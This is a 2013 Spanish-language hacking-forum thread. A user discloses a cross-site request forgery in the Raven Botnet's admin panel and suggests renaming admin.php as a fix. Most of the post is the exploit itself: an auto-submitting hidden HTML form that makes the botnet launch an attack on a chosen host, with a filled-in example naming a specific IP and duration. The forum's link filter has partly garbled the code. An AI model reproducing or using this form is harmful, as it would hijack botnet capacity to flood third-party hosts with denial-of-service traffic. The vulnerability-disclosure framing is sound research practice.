send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

CSRF Raven Botnet

  • 2 Respuestas
  • 1746 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« en: Agosto 28, 2013, 01:55:33 pm »
Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

Código: HTML5
  1. <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  2.  
  3. <!-- CSRF Raven botnet, by Metadato -->
  4.  
  5. <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login onload="document.csrf.submit();">
  6.         <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
  7.                 <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
  8.                 <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
  9.                 <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login type="hidden" name="start" value="Attack!">
  10.         </You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  11. </You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  12. </You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  13.  

Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

Código: HTML5
  1. <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  2.  
  3. <!-- CSRF Raven botnet, by Metadato -->
  4.  
  5. <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login onload="document.csrf.submit();">
  6.         <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
  7.                 <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login type="hidden" name="target" value="173.194.34.248">
  8.                 <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login type="hidden" name="time" value="500">
  9.                 <You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login type="hidden" name="start" value="Attack!">
  10.         </You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  11. </You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  12. </You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login>
  13.  

Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

Código: PHP
  1. echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';
  2.  

Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo  ;D
« Última modificación: Agosto 29, 2013, 07:04:38 am por Metadato »

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« Respuesta #1 en: Agosto 28, 2013, 02:33:37 pm »
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!


Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #2 en: Agosto 29, 2013, 11:12:07 am »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

Gracias Pekador, un saludo compa.
« Última modificación: Agosto 30, 2013, 10:32:44 am por Metadato »

 

¿Te gustó el post? COMPARTILO!



Webot Botnet - Frameshock

Iniciado por hdbreaker

Respuestas: 4
Vistas: 3004
Último mensaje Marzo 13, 2015, 12:44:48 pm
por n4pst3r
[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1692
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx
Ataques CSRF (Cross site request forgery)

Iniciado por M5f3r0

Respuestas: 11
Vistas: 5250
Último mensaje Septiembre 09, 2013, 03:48:08 pm
por M5f3r0
[TUTORIAL] Como crear tu csrf

Iniciado por Windero

Respuestas: 4
Vistas: 2327
Último mensaje Agosto 24, 2013, 08:09:05 am
por Réplica1
CSRF'S miarroba forums [By Pekador]

Iniciado por Réplica1

Respuestas: 1
Vistas: 1395
Último mensaje Agosto 27, 2013, 04:50:32 pm
por M5f3r0